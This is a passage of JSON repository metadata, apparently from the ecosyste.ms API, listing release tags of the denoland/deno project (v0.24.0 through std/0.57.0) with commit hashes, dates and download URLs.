parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re